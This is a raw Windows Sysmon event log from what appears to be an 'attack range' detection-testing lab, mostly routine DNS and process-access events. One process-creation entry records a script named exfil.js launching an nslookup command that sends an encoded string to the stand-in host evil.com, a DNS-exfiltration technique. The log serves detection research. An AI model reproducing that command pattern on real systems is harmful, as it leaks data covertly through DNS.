14:21:31.175{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50704- 354300x8000000000000000209463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.175{00000000-0000-0000-0000-000000000000}5592<unknown process>-udptruefalse127.0.0.1-50704-false127.0.0.1-53domain 354300x8000000000000000209462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.174{00000000-0000-0000-0000-000000000000}5592<unknown process>-udpfalsefalse127.0.0.1-50703-false127.0.0.1-53domain 354300x8000000000000000209461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.174{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50703- 354300x8000000000000000209460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.174{00000000-0000-0000-0000-000000000000}5592<unknown process>-udptruefalse127.0.0.1-50703-false127.0.0.1-53domain 354300x8000000000000000209459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.174{00000000-0000-0000-0000-000000000000}5592<unknown process>-udpfalsefalse127.0.0.1-50702-false127.0.0.1-53domain 354300x8000000000000000209458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.174{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50702- 354300x8000000000000000209457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.174{00000000-0000-0000-0000-000000000000}5592<unknown process>-udptruefalse127.0.0.1-50702-false127.0.0.1-53domain 354300x8000000000000000209456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.082{00000000-0000-0000-0000-000000000000}5036<unknown process>-udpfalsefalse127.0.0.1-50701-false127.0.0.1-53domain 354300x8000000000000000209455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.082{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50701- 354300x8000000000000000209454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.082{00000000-0000-0000-0000-000000000000}5036<unknown process>-udptruefalse127.0.0.1-50701-false127.0.0.1-53domain 354300x8000000000000000209453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.984{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50700- 354300x8000000000000000209452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.983{00000000-0000-0000-0000-000000000000}8092<unknown process>-udptruefalse127.0.0.1-50700-false127.0.0.1-53domain 354300x8000000000000000209451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.983{00000000-0000-0000-0000-000000000000}8092<unknown process>-udpfalsefalse127.0.0.1-50699-false127.0.0.1-53domain 354300x8000000000000000209450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.983{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50699- 354300x8000000000000000209449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.983{00000000-0000-0000-0000-000000000000}8092<unknown process>-udptruefalse127.0.0.1-50699-false127.0.0.1-53domain 354300x8000000000000000209448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.983{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50698- 354300x8000000000000000209447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.907{00000000-0000-0000-0000-000000000000}3348<unknown process>-udpfalsefalse127.0.0.1-50697-false127.0.0.1-53domain 354300x8000000000000000209446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.907{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50697- 354300x8000000000000000209445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.907{00000000-0000-0000-0000-000000000000}3348<unknown process>-udptruefalse127.0.0.1-50697-false127.0.0.1-53domain 354300x8000000000000000209444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.907{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50696- 354300x8000000000000000209443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.907{00000000-0000-0000-0000-000000000000}3348<unknown process>-udptruefalse127.0.0.1-50696-false127.0.0.1-53domain 354300x8000000000000000209442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.907{00000000-0000-0000-0000-000000000000}3348<unknown process>-udpfalsefalse127.0.0.1-50695-false127.0.0.1-53domain 354300x8000000000000000209441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.907{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50695- 354300x8000000000000000209440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.830{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50694- 354300x8000000000000000209439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.830{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50693- 354300x8000000000000000209438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.828{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50692- 354300x8000000000000000209437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.739{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50691- 354300x8000000000000000209436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.739{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50690- 354300x8000000000000000209435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.738{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50689- 354300x8000000000000000209434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.662{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50688- 354300x8000000000000000209433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.661{00000000-0000-0000-0000-000000000000}1188<unknown process>-udpfalsefalse127.0.0.1-50687-false127.0.0.1-53domain 354300x8000000000000000209432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.661{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50687- 354300x8000000000000000209431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.661{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50686- 354300x8000000000000000209430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.661{00000000-0000-0000-0000-000000000000}1188<unknown process>-udptruefalse127.0.0.1-50686-false127.0.0.1-53domain 354300x8000000000000000209429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.583{00000000-0000-0000-0000-000000000000}2628<unknown process>-udpfalsefalse127.0.0.1-50685-false127.0.0.1-53domain 354300x8000000000000000209428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.582{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50685- 354300x8000000000000000209427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.582{00000000-0000-0000-0000-000000000000}2628<unknown process>-udptruefalse127.0.0.1-50685-false127.0.0.1-53domain 354300x8000000000000000209426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.502{00000000-0000-0000-0000-000000000000}1352<unknown process>-udpfalsefalse127.0.0.1-50684-false127.0.0.1-53domain 10341000x8000000000000000209425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.281{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-DC43-000000005F02}5924C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.280{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-DC43-000000005F02}5924C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000209423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.502{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50684- 354300x8000000000000000209422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.501{00000000-0000-0000-0000-000000000000}1352<unknown process>-udptruefalse127.0.0.1-50684-false127.0.0.1-53domain 354300x8000000000000000209421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.501{00000000-0000-0000-0000-000000000000}1352<unknown process>-udpfalsefalse127.0.0.1-50683-false127.0.0.1-53domain 354300x8000000000000000209420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.501{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50683- 354300x8000000000000000209419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.501{00000000-0000-0000-0000-000000000000}1352<unknown process>-udptruefalse127.0.0.1-50683-false127.0.0.1-53domain 354300x8000000000000000209418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.500{00000000-0000-0000-0000-000000000000}1352<unknown process>-udpfalsefalse127.0.0.1-50682-false127.0.0.1-53domain 354300x8000000000000000209417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.500{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50682- 354300x8000000000000000209416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.500{00000000-0000-0000-0000-000000000000}1352<unknown process>-udptruefalse127.0.0.1-50682-false127.0.0.1-53domain 354300x8000000000000000209415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.408{00000000-0000-0000-0000-000000000000}3712<unknown process>-udpfalsefalse127.0.0.1-50681-false127.0.0.1-53domain 10341000x8000000000000000209414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.260{2E1864BB-18ED-629A-DC43-000000005F02}59246492C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-DB43-000000005F02}7212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.260{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-DC43-000000005F02}5924C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.244{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.244{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.244{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.244{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.244{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-DB43-000000005F02}7212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.244{2E1864BB-18E0-629A-6742-000000005F02}39764624C:\Windows\System32\WScript.exe{2E1864BB-18ED-629A-DB43-000000005F02}7212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.257{2E1864BB-18ED-629A-DB43-000000005F02}7212C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrty.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.244{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nloged.tmpMD5=13B747063E29DDAFB1C25744F690BAA2,SHA256=FFD02DE1BE5A2F9B37BEA75BF31D9F7DC3AB49C7A69DB9B5050D219E835321C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.214{2E1864BB-18ED-629A-D943-000000005F02}35961736C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-DA43-000000005F02}6448C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.214{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.214{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.214{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.214{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 